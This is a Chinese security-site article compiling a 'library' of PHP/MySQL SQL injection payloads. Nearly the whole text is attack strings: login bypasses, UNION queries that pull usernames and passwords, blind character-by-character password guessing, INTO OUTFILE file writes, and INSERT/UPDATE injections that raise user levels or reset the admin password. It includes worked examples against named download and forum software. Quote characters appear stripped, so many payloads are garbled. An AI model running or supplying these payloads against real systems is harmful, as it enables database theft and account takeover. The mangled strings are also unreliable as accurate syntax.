资讯 安全 论坛 下载 读书 程序开发 数据库 系统 网络 电子书 微信学院 站长学院 QQ 考试
频道栏目
网站安全| 安全资讯| 安全公告| 病毒预警| 人物| 企业招聘| 其他综合|
登录注册
首页 > 资讯 > 网站安全 > 正文

php Injection库总结

04-11-17        来源:[db:作者]  
收藏   我要投稿

or 1=1
or 1=1
/*
%23
and password=mypass
id=-1 union select 1,1,1
id=-1 union select char(97),char(97),char(97)
id=1 union select 1,1,1 from members
id=1 union select 1,1,1 from admin
id=1 union select 1,1,1 from user
userid=1 and password=mypass
userid=1 and mid(password,3,1)=char(112)
userid=1 and mid(password,4,1)=char(97)
and ord(mid(password,3,1))>111 (ord函数很好用,可以返回整形的)
and LENGTH(password)=6(探测密码长度)
and LEFT(password,1)=m
and LEFT(password,2)=my
..............................依次类推
union select 1,username,password from user/*
union select 1,username,password from user/*
= union select 1,username,password from user/* (可以是1或者=后直接跟)
99999 union select 1,username,password from user/*
into outfile c:/file.txt (导出文件)
= or 1=1 into outfile c:/file.txt
1 union select 1,username,password from user into outfile c:/user.txt
SELECT password FROM admins WHERE login=John INTO DUMPFILE /path/to/site/file.txt
id= union select 1,username,password from user into outfile
id=-1 union select 1,database(),version() (灵活应用查询)
常用查询测试语句,
SELECT * FROM table WHERE 1=1
SELECT * FROM table WHERE uuu=uuu
SELECT * FROM table WHERE 1<>2
SELECT * FROM table WHERE 3>2
SELECT * FROM table WHERE 2<3
SELECT * FROM table WHERE 1
SELECT * FROM table WHERE 1+1
SELECT * FROM table WHERE 1--1
SELECT * FROM table WHERE ISNULL(NULL)
SELECT * FROM table WHERE ISNULL(COT(0))
SELECT * FROM table WHERE 1 IS NOT NULL
SELECT * FROM table WHERE NULL IS NULL
SELECT * FROM table WHERE 2 BETWEEN 1 AND 3
SELECT * FROM table WHERE b BETWEEN a AND c
SELECT * FROM table WHERE 2 IN (0,1,2)
SELECT * FROM table WHERE CASE WHEN 1>0 THEN 1 END

例如:夜猫下载系统1.0版本
id=1 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1
id=10000 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and groupid=1
union select 1,username,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 (替换,寻找密码)
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,1,1))=49 (验证第一位密码)
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,2,1))=50 (第二位)
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,3,1))=51
..................................................................

例如2:灰色轨迹 变换id进行测试(meteor)
union%20(SELECT%20allowsmilies,public,userid,0000-0-0,user(),version()%20FROM%20calendar_events%20WHERE%20eventid%20=%2013)%20order%20by%20eventdate
union%20(SELECT%20allowsmilies,public,userid,0000-0-0,pass(),version()%20FROM%20calendar_events%20WHERE%20eventid%20=%2010)%20order%20by%20eventdate
构造语句:
SELECT allowsmilies,public,userid,eventdate,event,subject FROM calendar_events WHERE eventid = 1 union (select 1,1,1,1,1,1,1 from user where userid=1)
SELECT allowsmilies,public,userid,eventdate,event,subject FROM calendar_events WHERE eventid = 1 union (select 1,1,1,1,username,password from user where userid=1)
UNION%20(SELECT%201,0,2,1999-01-01,a,password%20FROM%20user%20WHERE%20userid%20=%205)%20order%20by%20eventdate
UNION%20(SELECT%201,0,12695,1999-01-01,a,password%20FROM%20user%20WHERE%20userid=13465)%20order%20by%20eventdate
UNION%20(SELECT%201,0,12695,1999-01-01,a,userid%20FROM%20user%20WHERE%20username=sandflee)%20order%20by%20eventdate (查沙子的id)

 

(SELECT a FROM table_name WHERE a=10 AND B=1 ORDER BY a LIMIT 10)
SELECT * FROM article WHERE articleid=$id UNION SELECT * FROM......(字段和数据库相同情况下,可直接提交)
SELECT * FROM article WHERE articleid=$id UNION SELECT 1,1,1,1,1,1,1 FROM......(不同的情况下)

特殊技巧:在表单,搜索引擎等地方写:
"___"
".__ "
"%
% ORDER BY articleid/*
% ORDER BY articleid#
__ ORDER BY articleid/*
__ ORDER BY articleid#

$command = "dir c:";system($command);
SELECT * FROM article WHERE articleid=$id
SELECT * FROM article WHERE articleid=$id
1 and 1=2 union select * from user where userid=1/* 句中变为
(SELECT * FROM article WHERE articleid=1 and 1=2 union select * from user where userid=1/*)
1 and 1=2 union select * from user where userid=1

语句形式:建立一个库,插入:
CREATE DATABASE `injection`
CREATE TABLE `user` (
`userid` int(11) NOT NULL auto_increment,
`username` varchar(20) NOT NULL default ,
`password` varchar(20) NOT NULL default ,
PRIMARY KEY (`userid`)
) ;
INSERT INTO `user` VALUES (1, swap, mypass);


插如一个注册用户:
INSERT INTO `user` (userid, username, password, homepage, userlevel) VALUES (, $username, $password, $homepage, 1);
"INSERT INTO membres (login,password,nom,email,userlevel) VALUES ($login,$pass,$nom,$email,1)";
INSERT INTO membres (login,password,nom,email,userlevel) VALUES (,,,,3)#,1)
"INSERT INTO membres SET login=$login,password=$pass,nom=$nom,email=$email";
INSERT INTO membres SET login=,password=,nom=,userlevel=3,email=
"INSERT INTO membres VALUES ($id,$login,$pass,$nom,$email,1)";

UPDATE user SET password=$password, homepage=$homepage WHERE id=$id
UPDATE user SET password=MD5(mypass) WHERE username=admin#), homepage=$homepage WHERE id=$id
"UPDATE membres SET password=$pass,nom=$nom,email=$email WHERE id=$id";
UPDATE membres SET password=[PASS],nom=,userlevel=3,email= WHERE id=[ID]
"UPDATE news SET Votes=Votes+1, score=score+$note WHERE idnews=$id";

长用函数:
DATABASE()
USER()
SYSTEM_USER()
SESSION_USER()
CURRENT_USER()
比如:
UPDATE article SET title=$title WHERE articleid=1 对应函数
UPDATE article SET title=DATABASE() WHERE id=1
#把当前数据库名更新到title字段
UPDATE article SET title=USER() WHERE id=1
#把当前 MySQL 用户名更新到title字段
UPDATE article SET title=SYSTEM_USER() WHERE id=1
#把当前 MySQL 用户名更新到title字段
UPDATE article SET title=SESSION_USER() WHERE id=1
#把当前 MySQL 用户名更新到title字段
UPDATE article SET title=CURRENT_USER() WHERE id=1
#把当前会话被验证匹配的用户名更新到title字段

:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
$req = "SELECT * FROM membres WHERE name LIKE %$search% ORDER BY name";
SELECT * FROM membres WHERE name LIKE %% ORDER BY uid#% ORDER BY name
SELECT * FROM membres WHERE name LIKE %% ORDER BY uid#% ORDER BY name
SELECT uid FROM admins WHERE login= OR a=a AND password= OR a=a (经典)
SELECT uid FROM admins WHERE login= OR admin_level=1# AND password=
SELECT * FROM table WHERE msg LIKE %hop
SELECT uid FROM membres WHERE login=Bob AND password LIKE a%# AND password=
SELECT * FROM membres WHERE name LIKE %% ORDER BY uid#% ORDER BY name

点击复制链接 与好友分享!回本站首页
相关TAG标签
上一篇:榨干MS SQL最后一滴血
下一篇:ACCESS-SQL注入攻击
相关文章
热门专题推荐 vmware win7激活工具 win10激活工具 excel word office激活 小马激活工具 重装系统 数据恢复 u盘启动工具
图文推荐
文章
推荐
热门新闻
· 锤子坚果Pro发布后,罗永浩哭了
· 想实习的大学党看过来!这些科技巨头最
· 罗永浩锤子发布会抢先消息:锤子科技新
· Google新一代系统Fuchsia OS界面曝光
· 中国唯一连续运营20余年的网络游戏,还
· iPhone都便宜了 为何国产手机越来越贵
· 丢人!谷歌和Facebook竟被虚假企业电邮
· 中国移动支付震惊日本网友 为什么美国

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站